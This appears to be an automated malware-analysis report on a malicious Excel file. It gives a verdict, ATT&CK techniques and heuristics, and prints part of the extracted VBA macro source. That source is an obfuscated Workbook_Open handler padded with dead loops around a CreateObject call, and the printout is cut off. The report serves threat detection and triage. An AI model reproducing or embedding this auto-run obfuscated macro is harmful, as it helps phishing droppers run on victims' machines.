Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Excel document containing VBA macros, specifically a Workbook_Open event handler. Heuristics indicate the use of Shell() and CreateObject(), common for executing arbitrary code. The VBA code is heavily obfuscated and truncated, preventing a full analysis of its actions, but the presence of these functions strongly suggests it attempts to download and execute a second-stage payload. The primary attack vector is likely Spearphishing Attachment.
Heuristics 6
- VBA macros detected (medium, 4 related findings), OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical), OLE_VBA_SHELL: Shell() call in VBA
- Workbook_Open macro (high), OLE_VBA_WBOPEN: Workbook_Open macro
- CreateObject call (high), OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14882 bytes |

SHA-256: 0fe7ff886c37c601655573ee257a0e3302cccf4b9055d381f9305d305eac80a2
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 4 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
FkV81Ol.hJ6HIsprBW3HOovWzHEY
While 26 = 5057
Dim F1A_rD6E7ixRi_Q_oWl2DDIzirmBfWf As Object
Wend
Dim IJUtpH6Z_wjtb As String
While 3 = 2406
Dim iiiIVqqafLUCpJY9Z3hiBmGMTk5s7g_bSq As Object
Wend
Dim P9Hboyo_m79 As String
While 1 = 3441
Dim q_8eZm3AJY5aTxuu8c8G3r93Zy7Ms37_IMmk7Me3JZHPUgwm4Cqj As Object
Wend
Dim nyE8_D_kpo As String
While 3 = 3853
Dim QPb5PFJIxt7_7airg2ARSoJVTTFnj2G4 As Object
Wend
Dim KeG1wYOpbtN6lh1 As String
While 15 = 2498
Dim nXQfKiVUl_Ei6_eh5kC2aRq4FlTziYNsvbaNRU6TyIeuqzS As Object
Wend
Dim p7JRTioYTq As String
While 24 = 6748
Dim WXiNeuLzUwbgOOioqCPw5KPRn3WE3IEBEg47V As Object
Wend
Dim ERWR4UBzGp4so1 As String
While 3 = 8083
Dim lGguJFPilWE7KpYZrTlRks3dAzNaeLbVMQb4hvsy_ep_L7HTYq8 As Object
Wend
Dim iFVN3NCtT1xCY4r As String
While 18 = 2648
Dim s3Me25kvLEB3QCp3AxM3NzCindBW8OaP_cMOF4yB7TIHzTupm8wN As Object
Wend
Dim J_c2zmzV3Lx6muw As String
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FkV81Ol"
Dim OH4n6t6NoRZFAEDas68VMGgKnntWfHkfK37WIvwBWTL4acrxvd1jUL2Gjq9Q_greq45GHpQ6G5834mtJ55kAQ_I9_y As String
Function xyYvF9K54p3rSsTs9bL__9UYbCaGtfLe_f(mDE1UDihcCLeddt_h_R_EhFjWPqdT6r4zQ98y_kgv9OIRaQuH5s8dW9_7dbDV_LgTQoKduNccuMER6P595TYKsXaR3ASkfJpuryAu_OWoOcsH2v_MgDatwTj2M2ks517jgTiF)
While 27 = 4566
Dim GbLYxdvDwjYUtwP_ekfcMKVCWfz3UlXf8NRiZ787 As Object
Wend
Dim jkRaG82AFIGrp As String
While 7 = 2494
Dim op6EHBPm2qJJ3Wecqnhli2l344YnyvKcpzRgV As Object
Wend
Dim bP4pRq3FPNiV As String
While 8 = 5082
Dim fXehEEvDCKNllxEeqdBD8FMVn5PIrulnyQ As Object
Wend
Dim RVo4isfbSPBPD As String
Dim nE6KgiTbwsxxTIXDQxuau9qNIqajq_vYkFsUEV_5c_EiaHJWnTacDcsoWqAyGtur6XLMZB84sz7t2FwAfC5VmRTFVD7XUNwsMWlB577lUgsMf8vO4_RDxW
While 22 = 5808
Dim dkWYvLeWYJH4IykUPhiwTesyv4Qgdv7SV1uhSUzaS32Ke_Y44FCqbc As Object
Wend
Dim r91hm2473lLygQ As String
While 2 = 6329
Dim CBA5rFcalfRvcWlVsNz2Hvpur7gU9N8paGz1EG9T_PUSN1W As Object
Wend
Dim eTf388oHPUNLtiF As String
While 19 = 531
Dim aVhlSUftOjNe12YUfzhAAbT9qu9iez5Mt2x9ukfB9iORrbwPz9rUJhE9Ai4 As Object
Wend
Dim hV7MXo_t8CZ As String
Dim wva1DZ63wo5vWRkyyYymTHUkbSD9RRverhNDoc_TeZkt1TFRZJzasGhnYyXsV6id3XDyDgHUSdG4fjtGLtgFaSvi9jmy_U7hzF1aPPN3AdGN_nFy_PflXaBildyc4SO7fhCXsRz5d
While 5 = 8413
Dim j4SfAZKBON7rsfGhCKvy7Jq8oATzlrryLXWwAnfov8RnjnMpOE7hKMc As Object
Wend
Dim XLUz__UYgfGd As String
While 3 = 1204
Dim SHTgWnEB82BVAwnietHl959inxfiZhuGaH4g4hi3_JefJ As Object
Wend
Dim yLZu4wVeeX As String
While 14 = 4529
Dim Hu3iGfkXE3513En7IOfwYaWo8SHon8t6mdWHn_uhiEYPC7STE6lF8q As Object
Wend
Dim qWLjwW5tGH9MW As String
While 26 = 4061
Dim qeQIc8LRAElA_wiqUm75epuaX7JnTQGCs5minal9cnoPj As Object
Wend
Dim iwiUCvdAQ1_ As String
While 22 = 4028
Dim tytewh8s8hPDI9C3_7Z1_c1yIjQQelBZDlyxpEK5p6QAQsYU_2dCz_9O8 As Object
Wend
Dim UKPoLUfy9g As String
While 21 = 427
Dim IML4teIDKyfYJ5QmG8jDlhzus_m_r6da As Object
Wend
Dim s1KuojQSy5DGW6 As String
Set wva1DZ63wo5vWRkyyYymTHUkbSD9RRverhNDoc_TeZkt1TFRZJzasGhnYyXsV6id3XDyDgHUSdG4fjtGLtgFaSvi9jmy_U7hzF1aPPN3AdGN_nFy_PflXaBildyc4SO7fhCXsRz5d = CreateObject(OH4n6t6NoRZFAEDas68VMGgKnntWfHkfK37WIvwBWTL4acrxvd1jUL2Gjq9Q_greq45GHpQ6G5834mtJ55kAQ_I9_y)
While 15 = 1939
Dim TWiMgN54jWaIt2HUOS_oRse7goOMqdqVw9RlGr7Kx7jWMYgao As Object
Wend
Dim hxxROpk1lp28p As String
While 10 = 2483
Dim LEpDUthfLgV2zUGGsFFwhGp3DfRpteADLG As Object
Wend
Dim tcqHCw2HTPZYXTb As String
While 14 = 1856
Dim r2htIGDYw9xa2vqeQnrkmZiCS5YvXanG7MAlbSC_oD3HM As Object
Wend
Dim T_UmuGtpsxQQ As String
... (truncated)